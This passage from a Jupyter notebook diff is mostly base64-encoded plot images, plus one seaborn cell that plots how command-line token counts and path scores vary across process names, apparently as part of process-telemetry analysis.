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"
+     },
+     "metadata": {}
+    }
+   ],
+   "metadata": {}
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 3,
+   "source": [
+    "# Looking at the variability of commandlines and process image paths\r\n",
+    "import seaborn as sns\r\n",
+    "sns.set(style=\"darkgrid\")\r\n",
+    "\r\n",
+    "proc_plot = sns.catplot(y=\"processName\", x=\"commandlineTokensFull\", \r\n",
+    "                        data=feature_procs.sort_values('processName'),\r\n",
+    "                        kind='box', height=10)\r\n",
+    "proc_plot.fig.suptitle('Variability of Commandline Tokens', x=1, y=1)\r\n",
+    "\r\n",
+    "proc_plot = sns.catplot(y=\"processName\", x=\"pathLogScore\", \r\n",
+    "                        data=feature_procs.sort_values('processName'),\r\n",
+    "                        kind='box', height=10, hue='isSystemSession')\r\n",
+    "proc_plot.fig.suptitle('Variability of Path', x=1, y=1);"
+   ],
+   "outputs": [
+    {
+     "output_type": "display_data",
+     "data": {
+      "text/plain": [
+       "<Figure size 720x720 with 1 Axes>"
+      ],
+      "image/png": "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